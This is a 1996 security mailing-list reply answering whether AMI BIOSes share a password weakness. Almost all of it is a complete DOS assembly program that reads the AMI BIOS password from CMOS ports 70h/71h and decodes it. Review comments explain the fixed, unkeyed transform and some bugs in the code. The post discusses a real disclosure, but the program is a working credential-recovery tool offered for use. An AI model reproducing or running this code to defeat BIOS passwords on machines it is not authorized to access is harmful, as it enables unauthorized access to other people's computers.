
Re: BoS: Magic password of some linux-box(Hardware..)


From: rmoar () apertos0 csc UVic CA (Roger Moar)
Date: Thu, 21 Nov 1996 08:36:25 -0800


Does anyone know if only the Award BIOS is susceptible to this?  In other
words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
behavior?

    Brian

    I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.

-Roger.

----------------------------------------------------------------------

; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall

CODE    SEGMENT                         ;single segment: this is a DOS .COM image
        ORG     100h                    ;.COM code starts right after the 256-byte PSP
        ASSUME  CS:CODE,DS:CODE         ;code and data share the one segment

Start   PROC    NEAR
;-----------------------------------------------------------------------
; Start - .COM entry point (no parameters).
; Reads 7 bytes from CMOS through ports 70h/71h into Password, then
; resolves the stored bytes one at a time and prints the result as
; characters between '[' and ']'.
; ABI:   DOS .COM, 16-bit real mode, CS = DS = ES = PSP segment
; Out:   terminates via int 21h/4Ch with ERRORLEVEL 0
; Uses:  ax, cx, dx, di, flags; stack (one push/pop pair); direct port I/O
; Security note: the stored bytes are recovered with a fixed, unkeyed
;        transform and no secret (see Decrypt), so the CMOS copy of a
;        BIOS password protects nothing against code that can reach
;        ports 70h/71h on the same machine.
;-----------------------------------------------------------------------
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->

        mov     cl,'['                  ;Bracket the password           v1.1
        call    CharOut                 ;display it                     v1.1

        cld                             ;insure forward                 v1.1
        mov     cl,0b7h                 ;CMOS starting address
                                        ;NOTE(review): on PC/AT-class hardware
                                        ;bit 7 of the index byte written to
                                        ;port 70h is the NMI mask, so 0b7h
                                        ;selects CMOS offset 37h with NMI
                                        ;disabled; nothing below writes an
                                        ;index with bit 7 clear, so NMI stays
                                        ;masked until exit - confirm for the
                                        ;chipset in question
;v1.1   lea     di,Password
        mov     di,offset Password      ;                               v1.1
        push    di                      ;save for later                 v1.1
Read_Password:
; Loop invariant: cl = next CMOS index to read, di = next free byte in Password.
        mov     al,cl                   ;CMOS address we want
        out     70h,al                  ;select CMOS index
        jmp     $+2                     ;delay a tick (jump to the next insn
                                        ;flushes the prefetch queue; classic
                                        ;pause between port accesses)
        in      al,71h                  ;Get password char (CMOS data port)
;v1.1   mov     [di],al                 ;stuff in buffer
;v1.1   inc     di                      ;bump
        stosb                           ;stuff in buffer                v1.1
                                        ;(writes ES:DI; DOS loads a .COM
                                        ;with ES = CS, so this is Password)
        inc     cl                      ;bump CMOS address
        cmp     cl,0b7h+7               ;done 7 chars yet?
        jnz     Read_Password           ;not yet

; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->

;v1.1   lea     di,Password
        pop     di                      ;restore pointer to password    v1.1
        and     byte ptr [di],0f0h      ;mask first char (low nibble of byte 0
                                        ;is discarded; only its high nibble
                                        ;seeds the chain below)
        inc     di                      ;point to next char
Decrypt_Next:
; Loop invariant: di points at the stored byte to resolve next; [di-1] is
; the byte before it (already loaded, and masked if it is byte 0).
        cmp     di,Offset Password+7    ;hit end?
        jnl     Completed               ;yep (signed compare on an offset -
                                        ;correct only while Password+7 < 8000h,
                                        ;true for this small .COM; jae is the
                                        ;unsigned form)
        cmp     byte ptr [di],0         ;current char a 0?
        jz      Completed               ;yep, 0 terminated

        xor     cl,cl                   ;handy 0 (cl = step count = output char)
        mov     ch,byte ptr [di-1]      ;get previous char (ch = running state)
Decrypt:
; One step of the byte transform:
;   ch = (ch >> 1) | (parity(bits 7,6,1,0 of ch) << 7)
; cl counts the steps until ch equals the stored byte at [di]; that count
; is what gets printed as the recovered character.
; NOTE(review): the search is unbounded - cl is 8 bits and simply wraps,
; and the only exit is the match at the bottom, so a stored byte that is
; never reached from its predecessor (e.g. corrupted CMOS) hangs the program.
        inc     cl                      ;build char in CL
        mov     ah,ch                   ;char to decrypt
        xor     dx,dx                   ;dh = number of set tap bits, dl = scratch
        test    ah,10000000b            ;tap bit 7
        jz      NotSet7
         inc    dh
NotSet7:
        test    ah,01000000b            ;tap bit 6
        jz      NotSet6
         inc    dh
NotSet6:
        test    ah,00000010b            ;tap bit 1
        jz      NotSet2
         inc    dh
NotSet2:
        test    ah,00000001b            ;tap bit 0
        jz      NotSet1
         inc    dh
NotSet1:
        add     dl,2                    ;dl = smallest even value >= dh (min 2)
        cmp     dl,dh
        jl      NotSet1                 ;loop

        sub     dl,dh                   ;dl = 1 exactly when dh is odd (tap parity)
        shr     ch,1                    ;shift state right; bit 7 is now 0
        cmp     dl,1
        jnz     $+5                     ;even parity: skip the add below
                                        ;($+5 = 2-byte jnz + 3-byte add ch,80h;
                                        ;assumes those exact encodings)
        add     ch,80h                  ;odd parity: feed it back in as bit 7
        cmp     ch,byte ptr [di]        ;match next char?
        jnz     Decrypt                 ;nope, continue

; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->

        mov     ah,2                    ;display char function (int 21h/02h)
        mov     dl,cl                   ;this char (the step count)
        int     21h

        inc     di                      ;next char
        jmp     Decrypt_Next            ;loop

; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->

Completed:
        mov     cl,']'                  ;Close the bracket              v1.1
        call    CharOut                 ;display it                     v1.1

        mov     ax,4c00h                ;terminate, ERRORLEVEL 0
        int     21h
Start   ENDP

;v1.1 New function: enter with char to display in CL
CharOut PROC    NEAR                    ;v1.1
; CharOut - write one character to stdout via DOS.
; In:    cl = character to display
; Clobb: ah, dl (plus whatever int 21h itself touches)
        mov     dl,cl                   ;DOS wants the character in DL
        mov     ah,2                    ;int 21h function 02h: display character
        int     21h
        ret
CharOut ENDP

;Password DB    6 DUP (?)
Password        label   byte            ;dynamic buffer                 v1.1
                                        ;no storage is reserved here: the
                                        ;7 bytes stored by Read_Password land
                                        ;just past the end of the code image,
                                        ;presumably relying on the rest of the
                                        ;.COM's segment being unused; the
                                        ;earlier 6-byte DB above would have
                                        ;been one byte short of the 7 read

CODE    ENDS
        END     Start                   ;program entry point


--

Roger Moar -- rmoar () csr uvic ca | http://apertos0.csc.uvic.ca/~rmoar


